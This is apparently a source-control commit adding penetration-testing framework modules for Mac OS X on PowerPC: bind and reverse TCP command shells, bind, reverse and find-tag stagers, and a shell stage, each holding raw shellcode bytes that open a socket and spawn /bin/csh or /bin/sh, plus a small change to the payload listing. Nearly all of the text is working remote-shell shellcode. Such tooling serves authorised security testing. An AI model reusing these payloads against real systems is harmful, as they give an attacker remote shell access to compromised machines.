some of the osx payloads

git-svn-id: file:///home/svn/incoming/trunk@2964 4d416f70-5f16-0410-b530-b9f4589650da

modules/payloads/singles/osx/ppc/shell_bind_tcp.rb

@@ -0,0 +1,53 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Osx
+module Ppc
+
+module ShellBindTcp
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX Command Shell, Bind TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection and spawn a command shell',
+			'Author'        => 'hdm',
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_PPC,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LPORT'    => [ 34, 'n' ],
+						},
+					'Payload' =>
+						# bind, listen, accept, dup2, vfork, execve(/bin/csh)
+						"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00\x61" +
+						"\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00\x00\x0d" +
+						"\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38\xa0\x00\x10" +
+						"\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80\x00\x10\x90\x81\xff\xe8" +
+						"\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x7c\x7e\x1b\x78\x38\xa0\x00\x02\x38\x00\x00\x5a\x7f\xc3\xf3\x78" +
+						"\x7c\xa4\x2b\x78\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa5\xff\xff" +
+						"\x2c\x05\xff\xff\x40\x82\xff\xe5\x38\x00\x00\x42\x44\x00\x00\x02" +
+						"\x7c\x00\x02\x78\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7c\x68\x02\xa6" +
+						"\x38\x63\x00\x28\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8" +
+						"\x38\x00\x00\x3b\x7c\x00\x04\xac\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x7f\xe0\x00\x08\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x00\x00\x00"
+				}
+			))
+	end
+
+end
+
+end end end end end

modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb

@@ -0,0 +1,49 @@
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Singles
+module Osx
+module Ppc
+
+module ShellReverseTcp
+
+	include Msf::Payload::Single
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Linux Command Shell, Reverse TCP Inline',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to attacker and spawn a command shell',
+			'Author'        => 'hdm',
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_PPC,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Payload'       =>
+				{
+					'Offsets' =>
+						{
+							'LPORT'    => [ 34, 'n'    ],
+							'LHOST'    => [ 36, 'ADDR' ],
+						},
+					'Payload' =>
+						"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00\x61" +
+						"\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00\x00\x0d" +
+						"\x00\x02\x10\xe1\x7c\x88\x02\xa6\x38\xa0\x00\x10\x38\x00\x00\x62" +
+						"\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa0\x00\x02" +
+						"\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78\x44\x00\x00\x02" +
+						"\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff\x40\x82\xff\xe5" +
+						"\x38\x00\x00\x42\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\xa5\x2a\x79" +
+						"\x40\x82\xff\xfd\x7c\x68\x02\xa6\x38\x63\x00\x20\x90\x61\xff\xf8" +
+						"\x90\xa1\xff\xfc\x38\x81\xff\xf8\x38\x00\x00\x3b\x7c\x00\x04\xac" +
+						"\x44\x00\x00\x02\x2f\x62\x69\x6e\x2f\x63\x73\x68\x00\x41\x41\x41"
+				}
+			))
+	end
+
+end
+
+end end end end end

modules/payloads/stagers/osx/ppc/bind_tcp.rb

@@ -0,0 +1,54 @@
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Osx
+module Ppc
+
+###
+#
+# BindTcp
+# -------
+#
+# OSX bind TCP stager.
+#
+###
+module BindTcp
+
+	include Msf::Payload::Stager
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Bind TCP Stager',
+			'Version'       => '$Revision$',
+			'Description'   => 'Listen for a connection',
+			'Author'        => 'hdm',
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_PPC,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 34, 'n'    ],
+						},
+					'Payload' =>
+						"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00\x61" +
+						"\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00\x00\x0d" +
+						"\x00\x02\x11\x5c\x00\x00\x00\x00\x7c\x88\x02\xa6\x38\xa0\x00\x10" +
+						"\x38\x00\x00\x68\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x38\x00\x00\x6a\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x7f\xc3\xf3\x78\x38\x00\x00\x1e\x38\x80\x00\x10\x90\x81\xff\xe8" +
+						"\x38\xa1\xff\xe8\x38\x81\xff\xf0\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x7c\x7e\x1b\x78\x38\x00\x00\x03\x7f\xc3\xf3\x78\x38\x81\xe0\x00" +
+						"\x38\xa0\x20\x00\x7c\x88\x03\xa6\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x4e\x80\x00\x20\x7c\x00\x02\x78"
+				}
+			))
+	end
+
+end
+
+end end end end end

modules/payloads/stagers/osx/ppc/find_tag.rb

@@ -0,0 +1,48 @@
+require 'msf/core'
+require 'msf/core/handler/find_tag'
+
+module Msf
+module Payloads
+module Stagers
+module Osx
+module Ppc
+
+###
+#
+# FindTag
+# -------
+#
+# OSX find tag stager.
+#
+###
+module FindTag
+
+	include Msf::Payload::Stager
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Find Tag Stager',
+			'Version'       => '$Revision$',
+			'Description'   => 'Use an established connection',
+			'Author'        => 'hdm',
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_PPC,
+			'Handler'       => Msf::Handler::FindTag,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+						},
+					'Payload' =>
+						"\x3b\xa0\x0f\xff\x3b\xc0\x0f\xff\x37\x9d\xf0\x02\x7f\xdc\xf0\x51" +
+						"\x41\x80\xff\xf0\x38\x1d\xf0\x67\x7f\xc3\xf3\x78\x38\x81\xef\xf8" +
+						"\x38\xa0\x0f\xff\x38\xdd\xf0\x81\x44\xff\xff\x02\x7c\xc6\x32\x79" +
+						"\xa3\x61\xef\xf8\x2c\x1b\x13\x37\x40\x82\xff\xd4\x38\x81\xef\xfc" +
+						"\x7c\x89\x03\xa6\x4c\x81\x04\x20\x7c\xc6\x32\x79"
+				}
+			))
+	end
+
+end
+
+end end end end end

modules/payloads/stagers/osx/ppc/reverse_tcp.rb

@@ -0,0 +1,52 @@
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+
+module Msf
+module Payloads
+module Stagers
+module Osx
+module Ppc
+
+###
+#
+# ReverseTcp
+# ----------
+#
+# OSX reverse TCP stager.
+#
+###
+module ReverseTcp
+
+	include Msf::Payload::Stager
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Reverse TCP Stager',
+			'Version'       => '$Revision$',
+			'Description'   => 'Connect back to the attacker',
+			'Author'        => 'hdm',
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_PPC,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Stager'        =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 34, 'n'    ],
+							'LHOST' => [ 36, 'ADDR' ],
+						},
+					'Payload' =>
+						"\x38\x60\x00\x02\x38\x80\x00\x01\x38\xa0\x00\x06\x38\x00\x00\x61" +
+						"\x44\x00\x00\x02\x7c\x00\x02\x78\x7c\x7e\x1b\x78\x48\x00\x00\x0d" +
+						"\x00\x02\x10\xe1\x7f\x00\x00\x01\x7c\x88\x02\xa6\x38\xa0\x00\x10" +
+						"\x38\x00\x00\x62\x7f\xc3\xf3\x78\x44\x00\x00\x02\x7c\x00\x02\x78" +
+						"\x38\x00\x00\x03\x7f\xc3\xf3\x78\x38\x81\xe0\x00\x38\xa0\x20\x00" +
+						"\x7c\x88\x03\xa6\x44\x00\x00\x02\x7c\x00\x02\x78\x4e\x80\x00\x20" +
+						"\x7c\x00\x02\x78"
+				}
+			))
+	end
+
+end
+
+end end end end end

modules/payloads/stages/osx/ppc/shell.rb

@@ -0,0 +1,40 @@
+require 'msf/core'
+require 'msf/base/sessions/command_shell'
+
+module Msf
+module Payloads
+module Stages
+module Osx
+module Ppc
+
+module Shell
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'OSX Command Shell',
+			'Version'       => '$Revision$',
+			'Description'   => 'Spawn a command shell',
+			'Author'        => 'hdm',
+			'Platform'      => 'osx',
+			'Arch'          => ARCH_PPC,
+			'Session'       => Msf::Sessions::CommandShell,
+			'Stage'         =>
+				{
+					'Payload' =>
+						"\x38\xa0\x00\x02\x38\x00\x00\x5a\x7f\xc3\xf3\x78\x7c\xa4\x2b\x78" +
+						"\x44\x00\x00\x02\x7c\x00\x02\x78\x38\xa5\xff\xff\x2c\x05\xff\xff" +
+						"\x40\x82\xff\xe5\x38\x00\x00\x7e\x38\x60\x00\x00\x38\x80\x00\x00" +
+						"\x44\x00\x00\x02\x48\x00\x00\x19\x38\x00\x00\x7f\x38\x60\x00\x00" +
+						"\x38\x80\x00\x00\x44\x00\x00\x02\x7c\xa5\x2a\x78\x38\x00\x00\x02" +
+						"\x44\x00\x00\x02\x48\x00\x00\x34\x7c\xa5\x2a\x79\x40\x82\xff\xfd" +
+						"\x7c\x68\x02\xa6\x38\x63\x00\x20\x90\x61\xff\xf8\x90\xa1\xff\xfc" +
+						"\x38\x81\xff\xf8\x38\x00\x00\x3b\x44\x00\x00\x02\x48\x00\x00\x0c" +
+						"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x38\x00\x00\x01\x38\x60\x00\x00" +
+						"\x44\x00\x00\x02\x60\x00\x00\x00"
+				}
+			))
+	end
+
+end
+
+end end end end end

msfpayload

@@ -12,7 +12,7 @@ require 'msf/base'
 def dump_payloads
 	tbl = Rex::Ui::Text::Table.new(
 		'Indent'  => 4,
-		'Header'  => "Framework Payloads",
+		'Header'  => "Framework Payloads (#{$framework.stats.num_payloads} total)",
 		'Columns' => 
 			[
 				"Name",